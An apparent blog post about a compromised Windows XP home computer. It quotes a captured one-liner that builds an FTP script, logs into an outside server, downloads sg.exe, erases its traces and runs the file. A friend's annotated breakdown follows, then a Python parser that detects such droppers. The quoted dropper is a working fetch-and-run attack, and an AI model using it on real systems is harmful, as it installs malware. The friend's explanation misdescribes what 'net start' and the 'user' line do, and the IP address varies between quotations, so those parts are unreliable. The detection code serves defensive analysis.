We have a desktop (with Windows XP installed) which my mother uses for her daily work. Needless to say, she doesn’t know much beyond checking email. So, whenever she has a problem or the comp messes up, I have to do the dirty work.
Recently, my mom thought that the comp had suddenly slowed down and asked me to take a look. The comp was definitely infiltrated. Not only was it unusually slow, but no new temporary files could be created. This is pretty serious, because common things like creating a zip file and burning CDs won’t work. The first thing I did was run chkdsk. I found that one of the files inside TEMP was cross-linked to allocation block 20, at which point chkdsk would hang.
I was randomly messing with the command line, in the hope that something would work, when this script suddenly popped up.
22.214.171.124 43642 >> ij &echo user t g >> ij &echo get sg.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &sg.exe &net start SharedAccess &exit
I don’t think the user is supposed to see this, but something I did (wish I knew what!) made this show up. Now, this was definitely an intrusion of some sort. I don’t know much about this stuff, so I fired this off to my good friend Jitesh Shah. Here is his reply (verbatim):
this script is connecting to a server and downloading sg.exe
and the ftp options mean the following:
-n = suppress auto-login
-v = suppress display of server responses
-s:filename = specify an ftp file. commands in this file are executed serially, as in a shell script
each command in a shell script is prefixed by “&”…
e.g. &dir, &cls, etc.
“net start” starts all the services…
here’s a little summary I managed:
(with a little change in your copy-pasted log... it should have been prefixed by the command “open”, as far as I know...)
here’s what happens :
open 126.96.36.199 43642 >> ij
“ij” is a normal file. Output redirection is used.
i.e. “open 188.8.131.52 43642” is written to a file “ij”
&echo user t g >> ij
next line in file is “user t g”, i.e. login to your computer using username “t” and password “g” (which means that there’s a backdoor already installed).
&echo get sg.exe >> ij
get the file “sg.exe” from the server. (probably a virus)
&echo bye >> ij
“bye” command quits ftp
&ftp -n -v -s:ij
execute the ftp command in the shell... and the input file is ij, which now looks something like this:
ij contents :
open 184.108.40.206 43642
user t g
remove the file “ij”... cover the traces
execute the downloaded virus file in shell
&net start SharedAccess
start all services, which are, by now, infected
quit the shell... work done!!
comp infected !!
So now, I’m going to Google this stuff a bit and see if I can get the hang of it. I’ll also be seeing if I can do some reverse engineering on sg.exe. What exactly does this exe do anyway? Is it a service in Windows? I also want to check if this script left some logs, and if I can get the attack IP. Nice! *Rubbing hands in delight!*
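The one-liner above is a textbook "echo-to-script, then ftp -s:" dropper, and the manual walk-through Jitesh did can be automated. The script below is an added example written for this page, not code from the post or from Jitesh: it splits the cmd.exe line on "&", rebuilds the file that the echo redirects write, reads the ftp commands out of it, and reports the host, port, credentials, fetched file, deleted file, launched binary and started service. It takes the captured line exactly as printed in the post (IP address included), and, following Jitesh's guess, treats the bare "<ip> <port>" first line as an implicit "open"; that treatment is an assumption. Anything it recognises as a dropper is a candidate for blocking outbound FTP to that host and hunting for the downloaded file.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# The one-liner exactly as it appears in the post (IP address left as printed there).
SAMPLE = (
    "22.214.171.124 43642 >> ij &echo user t g >> ij &echo get sg.exe >> ij "
    "&echo bye >> ij &ftp -n -v -s:ij &del ij &sg.exe &net start SharedAccess &exit"
)

# "echo <text> >> <file>"; the "echo" is optional because the first command
# in the captured line has none.
REDIRECT = re.compile(r"^(?:echo\s+)?(.*?)\s*>>\s*(\S+)$")
# "ftp ... -s:<file>": the -s switch makes ftp.exe read its commands from <file>.
FTP_SCRIPT = re.compile(r"^ftp\b.*?-s:(\S+)", re.IGNORECASE)


@dataclass
class Dropper:
    files: Dict[str, List[str]] = field(default_factory=dict)  # file -> lines appended to it
    script: Optional[str] = None  # file handed to ftp -s:
    host: Optional[str] = None
    port: int = 21
    user: Optional[str] = None
    password: Optional[str] = None
    downloads: List[str] = field(default_factory=list)
    deleted: List[str] = field(default_factory=list)
    executed: List[str] = field(default_factory=list)
    services: List[str] = field(default_factory=list)


def split_commands(cmdline: str) -> List[str]:
    """cmd.exe runs '&'-separated commands left to right, whether or not the previous one failed."""
    return [c.strip() for c in cmdline.split("&") if c.strip()]


def looks_like_host(token: str) -> bool:
    try:
        ipaddress.ip_address(token)
        return True
    except ValueError:
        return False


def interpret_ftp_script(d: Dropper, lines: List[str]) -> None:
    """Walk the reconstructed ftp script and pull out the connection details."""
    for line in lines:
        parts = line.split()
        if not parts:
            continue
        verb = parts[0].lower()
        # Assumption (as in the post): a bare "<ip> <port>" line is an implicit "open".
        if verb == "open" or looks_like_host(parts[0]):
            args = parts[1:] if verb == "open" else parts
            if args:
                d.host = args[0]
            if len(args) > 1 and args[1].isdigit():
                d.port = int(args[1])
        elif verb == "user" and len(parts) >= 2:
            d.user = parts[1]
            d.password = parts[2] if len(parts) >= 3 else None
        elif verb in ("get", "mget") and len(parts) >= 2:
            d.downloads.extend(parts[1:])


def reconstruct(cmdline: str) -> Dropper:
    d = Dropper()
    for cmd in split_commands(cmdline):
        m = REDIRECT.match(cmd)
        if m:  # the echo redirects: collect what each file ends up containing
            d.files.setdefault(m.group(2), []).append(m.group(1))
            continue
        m = FTP_SCRIPT.match(cmd)
        if m:
            d.script = m.group(1)
            continue
        parts = cmd.split()
        verb = parts[0].lower()
        if verb == "del":
            d.deleted.extend(parts[1:])
        elif verb == "net" and len(parts) >= 3 and parts[1].lower() == "start":
            d.services.append(parts[2])
        elif verb != "exit":
            d.executed.append(parts[0])
    if d.script and d.script in d.files:
        interpret_ftp_script(d, d.files[d.script])
    return d


def is_ftp_dropper(d: Dropper) -> bool:
    """The tell: ftp -s: reads a file the same command line just wrote, the login is
    scripted, and a file it fetched is then executed."""
    return (
        d.script is not None
        and d.script in d.files
        and bool(d.downloads)
        and any(x in d.executed for x in d.downloads)
    )


def summary(d: Dropper) -> List[str]:
    out = [f"ftp server: {d.host}:{d.port}", f"login: {d.user} / {d.password}"]
    out.append("fetched: " + ", ".join(d.downloads))
    out.append("executed: " + ", ".join(d.executed))
    out.append("deleted (trace cleanup): " + ", ".join(d.deleted))
    out.append("services started: " + ", ".join(d.services))
    return out


if __name__ == "__main__":
    dropper = reconstruct(SAMPLE)
    print("FTP dropper" if is_ftp_dropper(dropper) else "not a dropper")
    print("\n".join(summary(dropper)))
```

The reconstructed "ij" comes out with four lines (the open line, "user t g", "get sg.exe", "bye"), which is the complete script rather than the two lines the reply lists. Run over a Sysmon or EDR process-creation log, the same parser flags any cmd.exe line where ftp.exe's -s: file was written by echo moments earlier, which is the part of this pattern worth alerting on.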